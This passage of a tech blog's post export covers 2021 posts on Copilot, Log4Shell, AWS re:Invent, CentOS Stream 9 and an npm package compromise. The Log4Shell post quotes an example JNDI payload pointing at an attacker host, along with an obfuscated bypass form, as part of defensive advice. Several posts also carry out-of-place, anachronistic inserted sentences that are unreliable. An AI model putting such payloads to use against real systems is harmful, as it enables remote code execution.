step.\nI\u0026rsquo;ve also noticed that Copilot sometimes generates code that works but violates project conventions. It doesn\u0026rsquo;t understand your team\u0026rsquo;s patterns, your error handling strategy, or your abstraction boundaries. It generates statistically likely code, which means it tends toward common patterns from its training data rather than project-specific patterns.\nAnd then there\u0026rsquo;s the licensing question. Copilot was trained on public GitHub repositories, and there are legitimate concerns about whether it reproduces copyrighted code. I\u0026rsquo;ve seen it generate code blocks that look suspiciously like they were lifted from specific open source projects, sometimes with license-incompatible implications. The legal situation is murky, and I\u0026rsquo;d advise anyone using Copilot in a commercial context to be aware of this risk.\nHow It Changed My Workflow # The most interesting effect has been psychological. I now think about coding differently — I write more descriptive comments before implementing, because I know Copilot will use them as context. I name functions more carefully. I structure my code in smaller, more self-contained units.\nIn other words, Copilot has made me write code that\u0026rsquo;s more readable for humans because I\u0026rsquo;m optimizing for an AI that benefits from clear intent signals. That\u0026rsquo;s an unexpected but welcome side effect.\nI\u0026rsquo;ve also started using Copilot as a rubber duck. When I\u0026rsquo;m stuck on a problem, I\u0026rsquo;ll write a detailed comment describing what I need, see what Copilot suggests, and use that as a starting point for my thinking. Later AI-assisted development built on these foundational interactions. — even if I throw away the suggestion entirely. It\u0026rsquo;s faster than searching Stack Overflow for the specific pattern I need.\nThe Broader Implications # Copilot is clearly a preview of where software development is heading. The underlying technology — OpenAI\u0026rsquo;s Codex model — is improving rapidly, and I\u0026rsquo;d expect the suggestion quality to get meaningfully better over the next year or two. The evolution through Copilot agent mode validated this prediction.\nBut I think the framing of \u0026ldquo;AI replacing developers\u0026rdquo; misses the point entirely. Copilot doesn\u0026rsquo;t replace developers — it replaces the mechanical aspects of coding. The rise of agent systems showed how this augmentation evolved. The hard parts of software engineering — understanding requirements, designing systems, making architectural decisions, debugging production issues, communicating with stakeholders — none of that is touched by Copilot.\nIf anything, tools like Copilot make those higher-level skills more important. When generating code becomes cheap, the value shifts to knowing what code to generate and why. AI-assisted testing demonstrates how judgment remains critical. Experienced developers who understand systems thinking, performance implications, and security considerations become more valuable, not less.\nMy Take # After six months, I\u0026rsquo;m keeping Copilot in my editor. It saves me maybe 30-45 minutes per day on a typical coding day, mostly through boilerplate reduction and test scaffolding. That\u0026rsquo;s not transformative, but it\u0026rsquo;s meaningful.\nMy recommendation for other developers: try it with healthy skepticism. Treat every suggestion as a draft from a junior developer — potentially useful, definitely needs review. Don\u0026rsquo;t let it write security-sensitive code. Do use it for tests, boilerplate, and as a thinking tool.\nWe\u0026rsquo;re in the early days of AI-assisted development, and Copilot is a compelling first step. It\u0026rsquo;s not the revolution some claim, but it\u0026rsquo;s not a gimmick either. It\u0026rsquo;s a genuinely useful tool that happens to also be a glimpse of where our profession is heading.\nNow if you\u0026rsquo;ll excuse me, I have some holiday coding projects to get to — with my AI pair programmer along for the ride.\n","date":"23 December 2021","externalUrl":null,"permalink":"/posts/211223-six-months-with-github-copilot/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"After six months in the GitHub Copilot technical preview, here’s what AI pair programming actually looks like in day-to-day development work.","title":"Six Months with GitHub Copilot — An Honest Assessment","type":"posts"},{"content":"It\u0026rsquo;s been a week since Log4Shell exploded onto the scene, and if anything, the situation has gotten more complex rather than less. The initial patch in Log4j 2.15.0 turned out to be incomplete — a new CVE-2021-45046 was issued, and Apache rushed out version 2.16.0 which disables JNDI entirely by default. As I write this, there are reports of yet another issue being investigated. Teams that patched last weekend are patching again today.\nBut I don\u0026rsquo;t want to rehash the vulnerability details. Instead, I want to talk about the systemic problem that Log4Shell has made impossible to ignore: software supply chain security.\nThe Dependency Iceberg # Here\u0026rsquo;s a number that should keep every CTO awake at night: the average enterprise Java application contains between 100 and 400 transitive dependencies. Your developers chose maybe 20 of those explicitly. The other 80-380 came along for the ride, pulled in by the libraries you actually wanted.\nLog4j was lurking in those shadows for millions of applications. Some organizations are still discovering instances of Log4j in their infrastructure a week later — in legacy applications, in embedded systems, in commercial off-the-shelf software where they don\u0026rsquo;t even have access to the source code.\nThis isn\u0026rsquo;t a Java problem. It\u0026rsquo;s a software engineering problem. The npm ecosystem, Python\u0026rsquo;s PyPI, Ruby gems — they all have the same deep dependency graphs. The reason Java got hit this time is that Log4j happens to be the most popular logging library in one of the most widely deployed enterprise language ecosystems. Next time it could be a Python package or a Node.js module.\nSBOMs: The Ingredient Label We Need # The concept of a Software Bill of Materials — an SBOM — has been gaining traction this year, partly driven by the Executive Order on Improving the Nation\u0026rsquo;s Cybersecurity issued back in May. The idea is simple: every piece of software should come with a machine-readable list of every component it contains, like a nutritional label for code.\nIf every application had an SBOM, responding to Log4Shell would have been a lookup query instead of a week-long archaeological expedition through dependency trees and Docker images. \u0026ldquo;Show me everything that contains Log4j 2.x\u0026rdquo; should be a 30-second operation, not a multi-day audit.\nTwo standards are emerging: SPDX from the Linux Foundation and CycloneDX from OWASP. Both can express software component inventories in machine-readable formats. Tools like syft from Anchore can generate SBOMs from container images, and Maven and Gradle plugins exist for Java projects.\nThe challenge isn\u0026rsquo;t generating SBOMs — it\u0026rsquo;s making them a standard part of the software delivery pipeline. Every CI/CD build should produce an SBOM alongside the artifact. Every deployment should register its SBOM in a central inventory. Every vulnerability disclosure should trigger an automated cross-reference against that inventory.\nDependency Pinning and Verification # SBOMs are the inventory side of the problem. The integrity side is equally important. Supply chain security frameworks like SLSA would emerge to standardize this discipline. How do you know that the version of Log4j you downloaded from Maven Central is actually the code that the Apache team published?\nPackage signing and verification have been inconsistent across ecosystems. Maven Central has PGP signatures, but how many build pipelines actually verify them? npm introduced npm audit signatures only recently. Python\u0026rsquo;s PyPI has been working on adding proper signing support.\nI\u0026rsquo;ve been advocating for dependency pinning with hash verification in my projects for years — specifying not just the version but the exact SHA-256 hash of every dependency. npm security lessons reinforced these practices years later. It\u0026rsquo;s more work to maintain, but it means you can\u0026rsquo;t accidentally pull in a tampered package. Tools like Gradle\u0026rsquo;s dependency verification make this feasible.\nThe Maintainer Problem # The broader challenges of open source maintainer burnout would continue to complicate supply chain security.\nThere\u0026rsquo;s another dimension to this that doesn\u0026rsquo;t get enough attention: the human side. Log4j is maintained by a small team of volunteers. They\u0026rsquo;ve been working around the clock for a week to ship patches for a library that\u0026rsquo;s used by virtually every Fortune 500 company. Most of those companies have never contributed a dollar to Log4j\u0026rsquo;s maintenance.\nThis is the open source sustainability crisis in stark relief. We build trillion-dollar industries on top of software maintained by people in their spare time, and then we act surprised when a critical vulnerability slips through. The xkcd comic about the Nebraska problem has never been more relevant.\nIf your organization depends on Log4j — and it almost certainly does — consider this a wake-up call to invest in the open source projects you depend on. That can mean direct funding through platforms like GitHub Sponsors or Tidelift, contributing code reviews, or at minimum running and reporting results from security scanners.\nWhat I\u0026rsquo;m Implementing This Week # I\u0026rsquo;m not just writing about this — I\u0026rsquo;m acting on it. Here\u0026rsquo;s what I\u0026rsquo;m rolling out across my projects:\nSBOM generation in CI/CD: Every build now produces a CycloneDX SBOM alongside the artifact. Automated dependency scanning: Integrating Grype into the pipeline to check SBOMs against known vulnerabilities on every build. Dependency hash verification: Enabling Gradle\u0026rsquo;s dependency verification for all Java projects. Quarterly dependency audits: Scheduled reviews of the full dependency tree, not just direct dependencies. My Take # Log4Shell is a watershed moment for our industry. Not because the vulnerability itself is unique — it\u0026rsquo;s a severe RCE, but we\u0026rsquo;ve had those before. It\u0026rsquo;s a watershed because it exposed how utterly unprepared most organizations are to answer a simple question: \u0026ldquo;Are we affected?\u0026rdquo;\nThe fact that the answer took days or weeks instead of minutes is a systemic failure. We\u0026rsquo;ve spent two decades building increasingly complex dependency trees without building the tooling and processes to manage them safely.\nI genuinely hope this is the event that makes SBOMs and supply chain security mainstream. Not as a compliance checkbox, but as a fundamental engineering practice. The executive order was a nudge. Log4Shell is a shove. Let\u0026rsquo;s not wait for whatever comes next to actually start taking this seriously.\nThe patches will settle, the incident reports will be filed, and the news cycle will move on. What matters is what we build into our processes before the next Log4Shell hits.\n","date":"16 December 2021","externalUrl":null,"permalink":"/posts/211216-software-supply-chain-security-after-log4j/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A week after Log4Shell, the patching chaos continues. But the bigger lesson is about software supply chain security and why we need SBOMs now.","title":"After Log4Shell — Software Supply Chain Security Can't Wait","type":"posts"},{"content":"If you\u0026rsquo;re a developer or ops engineer reading this today, there\u0026rsquo;s a good chance you\u0026rsquo;ve already been pulled into an emergency response. A critical zero-day vulnerability in Apache Log4j, tracked as CVE-2021-44228 and nicknamed \u0026ldquo;Log4Shell,\u0026rdquo; was publicly disclosed today and it\u0026rsquo;s as bad as it sounds. We\u0026rsquo;re talking about a remote code execution vulnerability that scores a perfect 10.0 on the CVSS scale, affecting one of the most widely-used logging libraries in the Java ecosystem.\nI\u0026rsquo;ve been doing this for three decades, and I can count on one hand the vulnerabilities that feel this significant. This is one of them. The broader supply chain security implications emerged as a result.\nWhat\u0026rsquo;s Actually Happening # The vulnerability exploits Log4j\u0026rsquo;s message lookup substitution feature. Specifically, when Log4j processes a log message containing a JNDI (Java Naming and Directory Interface) lookup string like ${jndi:ldap://attacker.com/exploit}, it will actually resolve that URL and potentially execute arbitrary code from a remote server.\nLet that sink in. If an attacker can get a malicious string into any log message processed by a vulnerable Log4j instance — through a user-agent header, a form field, a chat message, literally anything that gets logged — they can achieve remote code execution on your server.\nThe affected versions are Log4j 2.0-beta9 through 2.14.1. Apache has released version 2.15.0 with a fix, but the scope of exposure is staggering.\nWhy This Is Different # Log4j isn\u0026rsquo;t just used by a few applications. It\u0026rsquo;s used by everything in the Java world. Supply chain security lessons built on this incident. Apache Struts, Apache Solr, Apache Druid, ElasticSearch, Minecraft servers, and countless enterprise applications all use Log4j. Many teams don\u0026rsquo;t even know they\u0026rsquo;re using it because it\u0026rsquo;s a transitive dependency — your application depends on a library that depends on another library that depends on Log4j.\nI just finished auditing one of my client projects. We found Log4j buried three levels deep in the dependency tree through a logging bridge we\u0026rsquo;d forgotten about. This is going to be the story for thousands of organizations over the coming days: discovering Log4j in places they never knew it existed.\nThe other factor that makes this so severe is the trivial exploitability. You don\u0026rsquo;t need specialized tools or deep technical knowledge. Similar incidents later highlighted this vulnerability class. The proof-of-concept fits in a tweet. Within hours of the disclosure, security researchers observed mass scanning activity across the internet looking for vulnerable servers.\nWhat to Do Right Now # If you\u0026rsquo;re running any Java-based application, here\u0026rsquo;s your action plan:\n1. Inventory your exposure. Check your dependency trees. Run mvn dependency:tree | grep log4j for Maven projects, or gradle dependencies | grep log4j for Gradle. Don\u0026rsquo;t forget to check your Docker images, your CI/CD tools (Jenkins uses Java!), and any commercial software running on your infrastructure.\n2. Upgrade Log4j to 2.15.0 wherever possible. This is the definitive fix. The release disables JNDI lookup by default.\n3. If you can\u0026rsquo;t upgrade immediately, apply the mitigation. For Log4j 2.10+, set the system property log4j2.formatMsgNoLookups=true or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true. For older versions, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.\n4. Monitor your WAF and IDS for strings containing ${jndi:. Be aware that obfuscation is possible — attackers are already using nested lookups like ${${lower:j}ndi: to bypass simple pattern matching.\n5. Assume compromise if you were running vulnerable versions exposed to the internet. Check for unusual outbound connections, new cron jobs, or unfamiliar processes.\nThe Transitive Dependency Problem # This vulnerability lays bare something I\u0026rsquo;ve been concerned about for years: the software supply chain problem. Modern applications don\u0026rsquo;t just have dependencies — they have dependency graphs that are impossibly complex to audit manually.\nA typical enterprise Java application might have 200+ transitive dependencies. Most developers couldn\u0026rsquo;t name more than a dozen of them. We implicitly trust that every single one of those libraries is secure, maintained, and doesn\u0026rsquo;t do anything unexpected. Log4Shell proves how dangerous that assumption is.\nWe need better tooling for dependency auditing. Solutions like Snyk, Dependabot, and OWASP Dependency-Check exist, but adoption is inconsistent. After this week, I expect that to change rapidly.\nMy Take # I\u0026rsquo;m writing this at my desk on a Thursday evening when I should be winding down for the week. Instead, like thousands of other engineers around the world, I\u0026rsquo;m patching systems and auditing dependencies. That\u0026rsquo;s the reality of a 10.0 CVSS vulnerability in ubiquitous software.\nWhat frustrates me most isn\u0026rsquo;t the vulnerability itself — bugs happen, even in well-maintained projects. What frustrates me is that the JNDI lookup feature that enables this exploit has been a known risk vector for years. The Log4j library was doing something incredibly powerful (and dangerous) by default, and the Java ecosystem collectively shrugged.\nThis is going to be a long week for a lot of teams. If you\u0026rsquo;re in the thick of it: document what you\u0026rsquo;re doing, communicate clearly with your stakeholders, and don\u0026rsquo;t skip the \u0026ldquo;assume compromise\u0026rdquo; step. The scanners were active before the CVE was even published.\nPatch now. Audit everything. And when the dust settles, we need to have a serious conversation about software supply chain security. This won\u0026rsquo;t be the last time a transitive dependency ruins everyone\u0026rsquo;s weekend.\n","date":"9 December 2021","externalUrl":null,"permalink":"/posts/211209-log4shell-zero-day/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A critical remote code execution vulnerability in Apache Log4j has sent the entire industry scrambling. Here’s what you need to know and do right now.","title":"Log4Shell — The Zero-Day That Broke the Internet's Weekend","type":"posts"},{"content":"AWS re:Invent is always a firehose of announcements, and this year\u0026rsquo;s edition in Las Vegas didn\u0026rsquo;t disappoint. After a virtual-only event last year, being back in person (with a hybrid option) felt like a statement in itself. But the real statement came from the product launches — AWS is clearly betting on making cloud infrastructure more opinionated, more abstracted, and more accessible to developers who\u0026rsquo;d rather not think about servers at all.\nThe Serverless Push Gets Serious # The biggest theme I picked up from the keynotes is AWS doubling down on serverless, but not just Lambda-style functions. We\u0026rsquo;re talking about serverless everything. The new SageMaker Serverless Inference offering lets you deploy ML models without provisioning instances. Amazon Redshift Serverless removes capacity planning from data warehousing. Even Amazon EMR is getting a serverless option.\nThis matters because it signals a shift in how AWS thinks about its own platform. This evolution continued through AWS re:Invent 2024. For years, EC2 was the foundation and everything else was a layer on top. Now, the foundation is increasingly the managed service itself. You don\u0026rsquo;t configure the compute — you describe the workload.\nFor those of us who\u0026rsquo;ve been building on AWS since the early days, this is both exciting and slightly terrifying. Exciting because it genuinely reduces operational overhead. Terrifying because each new abstraction is another layer of vendor lock-in that gets harder to replicate elsewhere.\nAWS Amplify Studio and the Developer Experience Play # One announcement that caught my eye was AWS Amplify Studio, a visual development environment that lets you build full-stack apps with a Figma-to-code workflow. You design your UI in Figma, connect it to a backend data model, and Amplify generates React components.\nI\u0026rsquo;ve been in this industry long enough to have a healthy skepticism about \u0026ldquo;visual development\u0026rdquo; tools. We\u0026rsquo;ve seen this movie before — from Dreamweaver to various low-code platforms. But Amplify Studio feels different because it doesn\u0026rsquo;t try to replace code. It generates standard React components that you can customize. It\u0026rsquo;s opinionated about the starting point but doesn\u0026rsquo;t lock you into a proprietary runtime.\nWhether this actually works well in practice remains to be seen. The demos were polished, as they always are at re:Invent. The real test is whether a team of three developers building a SaaS product finds this faster than their current workflow.\nGraviton3 and the ARM Architecture Bet # On the infrastructure side, the Graviton3 processor announcement was significant. AWS claims 25% better compute performance over Graviton2, with up to 2x better floating-point performance and support for DDR5 memory. The new C7g instances powered by Graviton3 are already in preview.\nThis is the third generation of AWS\u0026rsquo;s custom ARM chips, and the trajectory is clear. AWS is building its own silicon because it can offer better price-performance than Intel or AMD for many workloads. As someone who remembers when ARM in the server room sounded like science fiction, the speed of this transition is remarkable.\nThe practical implication for developers: if you\u0026rsquo;re not testing your workloads on Graviton instances, you\u0026rsquo;re likely leaving money on the table. Infrastructure choices around custom silicon became increasingly central to cloud strategy. Most containerized workloads and interpreted languages (Python, Node.js, Java) run without modification. Native compiled code needs an ARM build, but CI/CD pipelines handle that easily enough.\nThe Data Fabric Emerges # Several announcements pointed toward what I\u0026rsquo;d call AWS\u0026rsquo;s \u0026ldquo;data fabric\u0026rdquo; strategy. The new Amazon Lake Formation governed tables, S3 Object Lambda for transforming data on read, and tighter integration between Redshift, Athena, and SageMaker all paint a picture of data flowing more freely between services without ETL overhead.\nThis resonates with a pattern I\u0026rsquo;ve been seeing across client projects: organizations drowning in data pipelines. Every team builds their own Extract-Transform-Load process, and before you know it you have dozens of pipelines moving data between services that are all running in the same cloud provider. If AWS can genuinely reduce that plumbing, it\u0026rsquo;s a real productivity win. The data infrastructure evolution shows how these patterns matured.\nMy Take # Re:Invent 2021 felt like a maturation moment for AWS. The announcements weren\u0026rsquo;t about launching revolutionary new categories — they were about making existing categories easier to use, more integrated, and more serverless. That\u0026rsquo;s not as exciting for a keynote headline, but it\u0026rsquo;s exactly what most development teams actually need.\nThe subtext I\u0026rsquo;m reading is that AWS knows its biggest competitor isn\u0026rsquo;t Azure or GCP — it\u0026rsquo;s the complexity of its own platform. With over 200 services, the cognitive load of choosing the right AWS service for a task has become a genuine barrier. By making services more opinionated and integrated, they\u0026rsquo;re trying to reduce that decision fatigue.\nMy advice if you\u0026rsquo;re an AWS shop: look seriously at the Graviton3 instances for cost savings, evaluate whether Amplify Studio fits your frontend workflow, and start thinking about serverless-first for new workloads. The pricing model increasingly favors it, and the operational simplification is real.\nThe cloud keeps getting more abstract. Whether that\u0026rsquo;s a good thing depends entirely on whether you trust your cloud provider. After this re:Invent, AWS is certainly asking for more of that trust.\n","date":"2 December 2021","externalUrl":null,"permalink":"/posts/211202-aws-reinvent-2021-cloud-abstractions/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2021 delivered a clear message: the cloud is moving toward higher-level abstractions, and developers should pay attention.","title":"AWS re:Invent 2021 — The Cloud Just Got More Opinionated","type":"posts"},{"content":"AWS re:Invent is back in person this week after last year\u0026rsquo;s fully virtual event, and Las Vegas is once again filled with cloud engineers comparing badge ribbons. I\u0026rsquo;ve been following the announcements remotely, and while the full keynote slate is still ahead of us, the pre-conference launches and early sessions are already revealing where Amazon sees cloud infrastructure heading.\nThis year\u0026rsquo;s event comes at an interesting moment. Cloud adoption accelerated dramatically during the pandemic, and many organisations are now past the \u0026ldquo;lift and shift\u0026rdquo; phase and into the \u0026ldquo;how do we actually operate efficiently in the cloud\u0026rdquo; phase. The announcements so far reflect that maturity shift.\nThe Serverless Story Continues # AWS has been steadily expanding the serverless model beyond Lambda functions, and the direction is clear: they want serverless to be the default deployment model, not the exception.\nLambda itself has seen incremental improvements throughout 2021 — longer execution times, larger ephemeral storage, better cold start performance. But the more interesting story is how serverless thinking is permeating other services.\nAmazon Aurora Serverless v2 has been in preview, and the general availability is anticipated soon. The promise of a relational database that scales to zero and handles burst traffic without pre-provisioning is compelling. The evolution of serverless data services would continue to mature these capabilities. I\u0026rsquo;ve been running Aurora Serverless v1 for low-traffic applications, and while v1 had painful cold start issues (30+ seconds to wake up), the v2 architecture is fundamentally different — it scales in increments of 0.5 ACUs and can go from idle to full capacity in under a second.\nAWS App Runner, launched earlier this year, is Amazon\u0026rsquo;s answer to the \u0026ldquo;I just want to deploy a container without thinking about infrastructure\u0026rdquo; use case. This approach aligns with later platform engineering trends around developer experience. It\u0026rsquo;s not as mature as Google Cloud Run or Azure Container Apps, but it represents AWS acknowledging that not every team wants to configure VPCs, load balancers, and auto-scaling groups just to run a web service.\nGraviton and the ARM Transition # One of the more consequential stories at this year\u0026rsquo;s re:Invent is the continued expansion of AWS Graviton processors. The Graviton2-based instances have been available for over a year now, and the performance-per-dollar advantage is real — roughly 40% better price-performance compared to equivalent x86 instances for many workloads.\nGraviton3 is expected to be announced this week, and early indicators suggest another significant performance jump. For developers, this means taking ARM compatibility seriously if you haven\u0026rsquo;t already. Custom silicon strategies continued to evolve across cloud providers.\nIn practice, most modern application stacks work fine on ARM64. If you\u0026rsquo;re running containerised workloads with interpreted languages (Python, Node.js, Ruby), the switch is often as simple as building multi-architecture Docker images. Compiled languages need ARM64 builds, but Go, Rust, and .NET all have excellent cross-compilation support.\nWhere teams run into issues is with native dependencies — packages that include compiled C/C++ extensions. In the Node.js world, packages like sharp, bcrypt, and node-sass have ARM64 variants, but you occasionally hit a library that doesn\u0026rsquo;t. It\u0026rsquo;s worth auditing your dependency tree now.\nThe cost savings are significant enough that I\u0026rsquo;d recommend every team at least test their workloads on Graviton instances. For compute-heavy batch processing and containerised microservices, switching to Graviton can reduce your EC2 bill by 20-40%.\nObservability and the Operational Gap # A recurring theme in the sessions I\u0026rsquo;ve been following is observability. AWS has been investing in CloudWatch, X-Ray, and the recently launched CloudWatch Evidently and CloudWatch RUM (Real User Monitoring). The message is clear: as architectures become more distributed, understanding what\u0026rsquo;s happening in production becomes harder and more important.\nThe challenge for AWS has always been that their native observability tools lag behind dedicated platforms like Datadog, New Relic, and Grafana Cloud. CloudWatch metrics are essential, but the dashboarding and alerting experience remains clunky compared to third-party alternatives.\nWhat\u0026rsquo;s encouraging is the OpenTelemetry adoption. AWS has been contributing to OpenTelemetry and supporting the AWS Distro for OpenTelemetry (ADOT) as a first-class option. The maturity of OpenTelemetry as a standard has transformed observability practices. This is the right approach — standardise on open instrumentation protocols and let teams choose their analysis backend. I\u0026rsquo;ve been migrating several projects from X-Ray-specific instrumentation to OpenTelemetry, and the flexibility is worth the effort.\nCost Management: The Unsexy Essential # Among the less headline-grabbing but critically important developments is AWS\u0026rsquo;s continued investment in cost management tooling. The new Cost Anomaly Detection uses machine learning to identify unexpected spending patterns, and Savings Plans now cover more service categories.\nThis matters because cloud cost management is the number one operational concern I hear from engineering teams. The pay-as-you-go model that makes cloud attractive also makes it unpredictable. I\u0026rsquo;ve seen startups get bill shock from a misconfigured auto-scaling group or a forgotten development environment running over a weekend.\nIf you\u0026rsquo;re running any significant AWS workload and not using Cost Explorer with budgets and alerts, you\u0026rsquo;re flying blind. Cloud cost optimization and FinOps became increasingly critical as AWS complexity grew. It\u0026rsquo;s not glamorous work, but it\u0026rsquo;s the kind of infrastructure discipline that separates mature cloud operations from expensive experiments.\nMy Take # re:Invent has become so large that it\u0026rsquo;s impossible to absorb everything in real-time. Hundreds of announcements across dozens of services, many of them incremental improvements that individually seem minor but collectively reshape how we build software.\nThe trends I\u0026rsquo;m watching most closely are the serverless expansion (particularly Aurora Serverless v2), the Graviton processor line, and the OpenTelemetry adoption. These represent genuine improvements in cost, performance, and operational sanity — the things that matter when you\u0026rsquo;re actually running production workloads, not just building demos.\nI\u0026rsquo;ll be diving deeper into specific announcements as the keynotes roll out over the coming days. For now, if you\u0026rsquo;re not at re:Invent, the livestreams and session recordings are excellent. And if you are there — stay hydrated, wear comfortable shoes, and remember that the expo hall is not a viable lunch strategy despite the amount of free snacks available.\n","date":"25 November 2021","externalUrl":null,"permalink":"/posts/211125-aws-reinvent-2021-serverless-evolution/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Invent 2021 is underway in Las Vegas, and the announcements already hint at where cloud infrastructure is headed next.","title":"AWS re:Invent 2021 Kicks Off — Serverless and the Cloud Keep Evolving","type":"posts"},{"content":"CentOS Stream 9 was released this week, marking the next chapter in what has been one of the most contentious decisions in recent open-source history. If you\u0026rsquo;ve been managing Linux servers for any length of time, you\u0026rsquo;ve likely had opinions about this since Red Hat announced the shift from traditional CentOS to CentOS Stream in December 2020.\nI\u0026rsquo;ve run CentOS in production environments since version 4. The announcement that CentOS 8 would reach end-of-life on December 31, 2021 — years earlier than expected — forced a lot of us to rethink our infrastructure strategies. With Stream 9 now available, it\u0026rsquo;s worth examining where things stand.\nWhat CentOS Stream 9 Actually Is # For those who haven\u0026rsquo;t followed the saga, here\u0026rsquo;s the short version: traditional CentOS was a downstream rebuild of Red Hat Enterprise Linux (RHEL). RHEL would release, and CentOS would rebuild it from the source RPMs, giving you a binary-compatible, free alternative. CentOS Stream flips this relationship — it sits upstream of RHEL, serving as a rolling preview of the next RHEL minor release.\nCentOS Stream 9 tracks what will become RHEL 9, which is based on Fedora 34. This means:\nKernel 5.14 with significant improvements to cgroups v2, BPF, and io_uring GCC 11 as the default compiler, with C++17 fully supported Python 3.9 as the system Python OpenSSL 3.0, which is a major upgrade with implications for any TLS-dependent workload Podman 4.x previews, continuing Red Hat\u0026rsquo;s push away from Docker The technical foundations are solid. The question has always been whether the Stream model is suitable for production workloads.\nThe Trust Problem # The backlash against the CentOS Stream shift was never really about the technical merits. It was about trust and expectations. Thousands of organisations built their infrastructure on the understanding that CentOS was a stable, RHEL-compatible platform with a predictable lifecycle. Changing that social contract — especially accelerating CentOS 8\u0026rsquo;s EOL — felt like a betrayal.\nRed Hat\u0026rsquo;s argument is that CentOS Stream is more useful, not less. By contributing to Stream, you directly influence what goes into RHEL. Bugs you find and report in Stream get fixed before they reach the enterprise release. In theory, this is a better model for the community.\nIn practice, many sysadmins and infrastructure teams need stability guarantees, not influence over upstream. When your job is keeping production systems running, \u0026ldquo;rolling preview of the next minor release\u0026rdquo; is not reassuring language.\nThe Alternatives Have Matured # The silver lining of the CentOS saga is that it catalysed the creation of genuine alternatives:\nAlmaLinux, backed by CloudLinux, released its 8.x line in March 2021 and has been delivering point releases reliably. They\u0026rsquo;ve been transparent about their build process and governance, and they\u0026rsquo;ve attracted significant community support.\nRocky Linux, founded by CentOS co-creator Gregory Kurtzer, had its first stable release in June 2021. Rocky\u0026rsquo;s pitch is explicitly \u0026ldquo;what CentOS used to be\u0026rdquo; — a downstream RHEL rebuild with long-term stability.\nBoth projects are now established enough that they\u0026rsquo;re viable for production use. I\u0026rsquo;ve been testing AlmaLinux 8.5 in staging environments, and the compatibility with RHEL has been flawless so far. The migration path from CentOS 8 is straightforward — both projects provide conversion scripts that handle the transition in place.\nOracle Linux also deserves mention. It\u0026rsquo;s been around for years as a RHEL rebuild, and Oracle has been using the CentOS upheaval to promote it. The \u0026ldquo;Unbreakable Enterprise Kernel\u0026rdquo; is genuinely good, though Oracle\u0026rsquo;s reputation in the open-source community gives many people pause.\nWhat This Means for Your Infrastructure # If you\u0026rsquo;re still running CentOS 8, the clock is ticking. December 31, 2021, is just six weeks away, and after that, you stop receiving security updates. Here\u0026rsquo;s my pragmatic advice:\nFor existing CentOS 8 systems: Migrate to AlmaLinux or Rocky Linux. Both offer in-place migration tools. Test thoroughly in staging first, but the process is well-documented and well-tested by now.\nFor new deployments: If you need RHEL compatibility, choose AlmaLinux or Rocky based on your preference. If you\u0026rsquo;re open to a different approach, consider whether you actually need an enterprise Linux distribution at all. For containerised workloads, minimalist base images (Alpine, distroless) often make more sense.\nFor CentOS Stream: It has a legitimate place in development and testing environments where you want early access to what\u0026rsquo;s coming in the next RHEL release. I wouldn\u0026rsquo;t run it for customer-facing production workloads yet, but for CI/CD environments and internal tooling, it\u0026rsquo;s perfectly reasonable.\nMy Take # The CentOS Stream transition has been handled poorly from a communications perspective, but the resulting ecosystem might actually be healthier than what we had before. Instead of one community rebuild that everyone depended on, we now have multiple well-funded alternatives with different governance models.\nCompetition and choice are good for the enterprise Linux ecosystem. AlmaLinux and Rocky Linux have both demonstrated they can deliver timely, compatible rebuilds. CentOS Stream serves a different purpose — one that\u0026rsquo;s genuinely useful for developers and contributors even if it\u0026rsquo;s not what production sysadmins wanted.\nWhat I find most encouraging is the speed at which the community responded. Within months of Red Hat\u0026rsquo;s announcement, we had multiple viable alternatives. That\u0026rsquo;s the open-source ecosystem working exactly as it should — when one path closes, the community builds new ones.\nThe enterprise Linux landscape is more fragmented now than it\u0026rsquo;s been in years. But fragmented doesn\u0026rsquo;t mean broken. It means we have options. And after depending on a single free RHEL rebuild for nearly two decades, having options feels like progress.\n","date":"18 November 2021","externalUrl":null,"permalink":"/posts/211118-centos-stream-9-enterprise-linux-shift/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"CentOS Stream 9 has arrived as the successor to both CentOS 8 and the traditional CentOS model — and the enterprise Linux community is still adapting.","title":"CentOS Stream 9 Lands — The Enterprise Linux Landscape Keeps Shifting","type":"posts"},{"content":"If you\u0026rsquo;re a JavaScript developer and your CI/CD pipeline started failing around November 4th, you\u0026rsquo;re not alone. Two widely-used npm packages — coa (a command-line option parser with 9 million weekly downloads) and rc (a configuration loader with 14 million weekly downloads) — were compromised. Malicious versions were published that attempted to steal passwords and install cryptominers.\nThis comes barely two weeks after the ua-parser-js incident that I wrote about recently. The npm ecosystem is having a very bad autumn, and the pattern is becoming impossible to ignore.\nWhat Happened # The attack followed a depressingly familiar pattern. The npm accounts of the package maintainers were compromised — likely through credential reuse or phishing — and the attackers published new versions containing malicious code.\nFor coa, versions 2.0.3, 2.0.4, 2.1.1, 2.1.3, and 3.0.1 were published on November 4th. For rc, version 1.2.9, 1.3.9, and 2.3.9 appeared shortly after. The malicious code was obfuscated but, when analysed, was found to:\nDetect the operating system Download a platform-specific binary from a remote server Execute the binary, which functioned as a password stealer (specifically targeting Chrome and Firefox stored credentials) On some variants, install a cryptocurrency miner The npm security team acted relatively quickly, unpublishing the compromised versions within hours. But \u0026ldquo;within hours\u0026rdquo; in npm-land means potentially millions of installations.\nWhy This Keeps Happening # The fundamental issue hasn\u0026rsquo;t changed since I first started writing about npm supply chain risks: the JavaScript ecosystem has a deep dependency problem, and the security model hasn\u0026rsquo;t kept pace.\nAccount security is the weakest link. npm has offered two-factor authentication since 2017, but it\u0026rsquo;s not mandatory — even for packages with millions of dependents. After the ua-parser-js incident, npm announced plans to require 2FA for maintainers of high-impact packages. But that\u0026rsquo;s not implemented yet, and coa and rc were compromised in the gap.\nDependency depth amplifies blast radius. Both coa and rc are transitive dependencies pulled in by popular tools. coa is a dependency of css-loader and svgo, which are dependencies of create-react-app. If you ran npx create-react-app during the window of compromise, you were affected. The average npm project has hundreds of transitive dependencies, and most developers couldn\u0026rsquo;t name half of them.\nVersion ranges make it worse. Many package.json files use semver ranges like ^1.2.8, which automatically install newer minor and patch versions. The attackers exploited this by publishing versions that fell within common semver ranges. If your lockfile 